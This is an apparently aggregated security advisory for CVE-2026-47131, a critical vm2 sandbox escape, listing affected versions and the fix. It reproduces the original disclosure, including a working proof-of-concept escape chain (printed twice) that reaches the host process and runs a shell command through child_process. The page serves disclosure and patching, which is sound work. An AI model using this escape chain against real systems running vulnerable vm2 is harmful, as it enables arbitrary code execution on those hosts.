Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
10.0
CVE-2026-47131: vm2 Sandbox Escape allows Arbitrary Code Execution
GHSA-v6mx-mf47-r5wg
CVE-2026-47131
Summary
A vulnerability in the vm2 library allows attackers to escape the sandbox and run arbitrary code on the host system. This could potentially lead to unauthorized access or data theft. To protect against this vulnerability, consider updating to the latest version of the vm2 library or using a secure alternative.
What to do
- Update GitHub Actions vm2 to version 3.11.4.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 |
<= 3.11.3 Fix: upgrade to 3.11.4
|
Original title
vm2 has a Sandbox Escape issue
Original description
### Summary
By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox.
This allows attackers to run arbitrary code.
### PoC
```js
"use strict";
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
"use strict";
const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
async function f() {
try {
await WebAssembly.compileStreaming();
} catch(e) {
setProto.call(getProto.call(e), null);
}
try {
await WebAssembly.compileStreaming();
} catch(e) {
const HostFunction = e.constructor.constructor;
new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
}
}
f();
`);
```
### Impact
Sandbox Escape → RCE
By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox.
This allows attackers to run arbitrary code.
### PoC
```js
"use strict";
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
"use strict";
const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
async function f() {
try {
await WebAssembly.compileStreaming();
} catch(e) {
setProto.call(getProto.call(e), null);
}
try {
await WebAssembly.compileStreaming();
} catch(e) {
const HostFunction = e.constructor.constructor;
new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
}
}
f();
`);
```
### Impact
Sandbox Escape → RCE
ghsa CVSS3.1
10.0
Vulnerability type
CWE-913
Published: 29 May 2026 · Updated: 29 May 2026 · First seen: 29 May 2026